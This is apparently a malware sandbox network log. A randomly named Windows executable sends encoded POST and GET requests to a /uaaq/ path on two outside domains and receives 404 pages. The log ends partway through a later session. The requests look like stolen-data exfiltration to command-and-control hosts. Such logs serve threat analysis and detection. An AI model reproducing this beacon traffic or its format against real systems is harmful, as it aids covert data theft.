                                                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    51192.168.11.304980566.96.162.139803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:10.394123077 CET1662OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.dabblefurnishings.space
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.dabblefurnishings.space
                                                                                    Referer: http://www.dabblefurnishings.space/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 55 4d 6a 4f 7a 6e 73 44 62 52 58 4e 72 53 70 56 58 78 78 64 42 76 32 2f 49 38 50 62 2b 61 47 68 6d 38 30 67 78 52 33 78 58 38 4f 66 49 56 70 5a 6b 55 74 51 7a 51 30 2b 42 39 64 6c 6a 53 59 5a 38 75 55 49 7a 41 55 78 6b 4e 67 6b 54 4f 74 44 36 50 62 67 33 76 2f 73 44 57 74 6a 6a 41 69 50 37 46 73 48 5a 72 4e 70 4b 69 30 76 77 6b 76 4e 73 4a 53 58 75 61 52 41 65 2f 67 4b 39 69 32 61 34 52 48 2f 77 4c 49 2b 79 77 76 39 49 54 73 41 43 45 54 45 2f 78 72 35 38 42 51 33 77 58 76 4c 66 75 4d 6a 78 2b 44 76 47 52 36 56 7a 46 2b 72 71 65 75 67 36 38 78 69 30 4b 30 65 54 64 35 56 34 65 79 52 50 55 42 58 34 57 39 56 39 68 71 7a 63 63 72 72 47 4d 56 6d 78 68 48 55 78 53 70 4f 56 49 67 6e 56 36 75 66 4b 6f 61 47 77 4b 31 36 42 30 73 42 57 49 69 39 68 63 2f 30 33 34 57 78 72 41 6d 2f 53 71 70 58 33 72 30 6b 6a 52 73 47 6b 43 4d 64 2b 37 50 58 39 65 30 34 6c 33 64 78 49 56 63 65 71 56 6a 53 6c 64 4f 41 53 77 4b 30 47 6f 68 30 65 4c 31 75 61 61 43 69 43 70 4a 32 51 65 6a 73 34 39 68 2b 71 66 4c 33 7a 32 5a 6a 78 74 64 68 72 37 66 2f 79 71 41 7a 68 68 59 77 52 4c 41 48 4f 66 64 6e 2f 66 50 6b 59 74 55 35 46 50 6c 4e 34 63 37 38 59 47 4c 6c 62 36 67 57 46 57 6c 50 76 65 56 62 46 37 78 2b 31 41 38 6c 63 62 68 4f 54 54 69 51 55 50 4d 66 6c 42 2b 7a 6b 76 58 4c 53 56 52 2f 71 68 64 45 4f 66 48 41 48 69 62 43 65 7a 5a 4b 76 39 56 42 72 4c 37 4b 6e 57 57 56 48 69 67 4c 66 35 78 39 62 69 33 53 67 38 47 36 67 58 36 32 64 43 63 76 56 64 4a 43 56 38 55 38 76 32 2f 66 75 49 66 55 55 43 33 36 54 4f 38 6f 34 64 55 4d 71 2b 57 31 55 42 45 52 41 6f 32 77 42 36 72 54 74 61 32 35 2b 6c 43 68 37 4c 79 65 2b 4c 38 59 6e 6e 62 74 53 70 56 65 62 75 41 78 49 6f 63 7a 78 4c 6d 77 54 75 47 73 75 51 58 75 74 48 66 42 52 79 72 7a 55 46 44 33 74 51 2b 61 47 70 59 45 54 63 44 41 55 62 6a 4e 54 67 74 32 2b 78 58 6a 53 59 5a 4c 45 6f 63 68 78 68 76 76 37 45 6f 34 36 51 41 74 73 63 73 6d 43 52 69 44 45 46 5a 65 77 34 4d 36 46 31 30 2f 74 74 6c 68 34 34 45 4a 48 53 44 53 31 57 2f 4d 75 38 4c 6c 6e 54 75 52 41 63 76 6b 45 35 4c 51 5a 4e 6f 52 79 63 4e 7a 41 74 43 4b 78 67 2f 67 31 32 65 39 39 65 62 70 70 78 71 48 36 56 47 6c 75 51 79 6b 4c 31 68 65 35 31 39 6e 42 59 32 4a 5a 35 34 4b 36 78 55 66 68 2b 72 6e 63 76 35 56 77 6a 71 79 52 2f 72 31 41 51 77 53 59 36 45 49 38 69 57 4f 31 52 4a 45 55 79 67 7a 30 57 57 34 7a 50 67 2f 79 2b 45 68 35 6d 4d 6f 70 4b 6a 56 49 54 7a 59 55 64 39 48 4a 4b 57 45 46 49 6c 2f 5a 77 66 37 37 4a 79 57 56 6f 4a 66 56 7a 68 2f 35 51 34 70 2b 54 45 45 39 59 52 53 50 66 42 35 56 6c 58 78 52 4e 65 30 46 32 75 71 72 63 79 4f 6d 53 79 56 4a 52 33 72 57 56 42 30 7a 51 49 43 56 61 47 4a 36 39 72 38 64 64 38 65 59 35 6d 31 2b 47 56 44 64 79 53 4e 69 37 36 2f 6c 68 45 6e 59 79 74 57 5a 4c 2f 72 63 55 68 54 69 64 59 4a 53 43 6b 79 71 43 69 76 34 46 64 45 32 70 55 5a 73 73 63 43 4a 31 76 67 67 4c 6d 32 73 42 37 35 68 4a 4f 5a 49 46 6d 39 63 67 68 70 56 49 61 38 6d 63 42 30 78 73 66 2f 44 53 48 61 78 4f 6b 62 71 57 41 53 52 59 49 75 59 70 4d 38 37 41 61 53 59 54 6e 65 45 4d 77 36 68 61 55 77 72 74 67 7a 5a 65 62 38 69 6f 6d 4f 44 41 54 76 52 6a 55 54 48 6e 72 56 6c 37 5a 63 52 4b 6c 4f 4a 5a 31 53 35 56 39 61 65 46 63 43 2b 33 7a 74 65 68 53 55 4e 58 46 2f 2b 76 68 38 36 48 43 41 51 6a 5a 4e 4c 31 38 4d 48 59 56 69 4e 48 2b 55 65 7a 38 4d 6d 33 6f 67 53 50 54 6b 66 46 42 41 58 7a 7a 65 58 6f 77 56 4d 36 62 72 31 46 49 6c
                                                                                    Data Ascii: 9pG0L=UMjOznsDbRXNrSpVXxxdBv2/I8Pb+aGhm80gxR3xX8OfIVpZkUtQzQ0+B9dljSYZ8uUIzAUxkNgkTOtD6Pbg3v/sDWtjjAiP7FsHZrNpKi0vwkvNsJSXuaRAe/gK9i2a4RH/wLI+ywv9ITsACETE/xr58BQ3wXvLfuMjx+DvGR6VzF+rqeug68xi0K0eTd5V4eyRPUBX4W9V9hqzccrrGMVmxhHUxSpOVIgnV6ufKoaGwK16B0sBWIi9hc/034WxrAm/SqpX3r0kjRsGkCMd+7PX9e04l3dxIVceqVjSldOASwK0Goh0eL1uaaCiCpJ2Qejs49h+qfL3z2Zjxtdhr7f/yqAzhhYwRLAHOfdn/fPkYtU5FPlN4c78YGLlb6gWFWlPveVbF7x+1A8lcbhOTTiQUPMflB+zkvXLSVR/qhdEOfHAHibCezZKv9VBrL7KnWWVHigLf5x9bi3Sg8G6gX62dCcvVdJCV8U8v2/fuIfUUC36TO8o4dUMq+W1UBERAo2wB6rTta25+lCh7Lye+L8YnnbtSpVebuAxIoczxLmwTuGsuQXutHfBRyrzUFD3tQ+aGpYETcDAUbjNTgt2+xXjSYZLEochxhvv7Eo46QAtscsmCRiDEFZew4M6F10/ttlh44EJHSDS1W/Mu8LlnTuRAcvkE5LQZNoRycNzAtCKxg/g12e99ebppxqH6VGluQykL1he519nBY2JZ54K6xUfh+rncv5VwjqyR/r1AQwSY6EI8iWO1RJEUygz0WW4zPg/y+Eh5mMopKjVITzYUd9HJKWEFIl/Zwf77JyWVoJfVzh/5Q4p+TEE9YRSPfB5VlXxRNe0F2uqrcyOmSyVJR3rWVB0zQICVaGJ69r8dd8eY5m1+GVDdySNi76/lhEnYytWZL/rcUhTidYJSCkyqCiv4FdE2pUZsscCJ1vggLm2sB75hJOZIFm9cghpVIa8mcB0xsf/DSHaxOkbqWASRYIuYpM87AaSYTneEMw6haUwrtgzZeb8iomODATvRjUTHnrVl7ZcRKlOJZ1S5V9aeFcC+3ztehSUNXF/+vh86HCAQjZNL18MHYViNH+Uez8Mm3ogSPTkfFBAXzzeXowVM6br1FIl
                                                                                    Dec 4, 2023 12:08:10.512509108 CET1143INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:10 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 867
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    52192.168.11.304980666.96.162.139803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:13.015963078 CET435OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZOLuwQ4GbhudklNTaAF4CqvaFcPUnb+ksfYc3Sr7bbbYZkY3qV8I6hFKN8xphgAEys4W8UAai/ACKckVxru298r+LRMvoVTRoA== HTTP/1.1
                                                                                    Host: www.dabblefurnishings.space
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:08:13.139214039 CET1143INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 867
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 0
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    53192.168.11.3049807203.175.9.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:19.339960098 CET710OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.projectmerdeka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.projectmerdeka.com
                                                                                    Referer: http://www.projectmerdeka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 6a 4b 43 5a 35 78 30 33 4e 42 54 33 6f 58 73 52 79 39 6b 6f 54 6b 78 6e 51 70 72 53 41 65 57 45 57 53 43 50 43 2b 6e 34 69 64 4d 75 4b 31 7a 7a 57 5a 69 72 51 4d 70 52 4a 61 5a 56 6c 35 52 49 78 39 51 63 47 5a 44 77 6e 31 67 46 53 4c 65 43 6a 58 68 6a 55 72 72 58 59 4c 74 4b 56 39 75 6a 72 54 65 63 71 4c 62 75 7a 71 50 77 61 5a 4c 6e 43 37 72 77 49 58 49 61 5a 6a 53 53 38 58 66 6b 79 2b 4c 51 61 6d 72 4d 46 70 37 43 50 6d 57 6e 37 38 37 66 76 4d 6e 4a 41 67 74 61 35 69 58 30 72 37 2b 2b 32 77 39 4b 6a 76 5a 51 56 6e 61 65 77 51 3d 3d
                                                                                    Data Ascii: 9pG0L=jKCZ5x03NBT3oXsRy9koTkxnQprSAeWEWSCPC+n4idMuK1zzWZirQMpRJaZVl5RIx9QcGZDwn1gFSLeCjXhjUrrXYLtKV9ujrTecqLbuzqPwaZLnC7rwIXIaZjSS8Xfky+LQamrMFp7CPmWn787fvMnJAgta5iX0r7++2w9KjvZQVnaewQ==
                                                                                    Dec 4, 2023 12:08:19.690722942 CET1340INHTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1238
                                                                                    date: Mon, 04 Dec 2023 11:08:18 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                    Dec 4, 2023 12:08:19.690759897 CET244INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                    Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    54192.168.11.3049809203.175.9.19803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:22.224276066 CET730OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.projectmerdeka.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.projectmerdeka.com
                                                                                    Referer: http://www.projectmerdeka.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
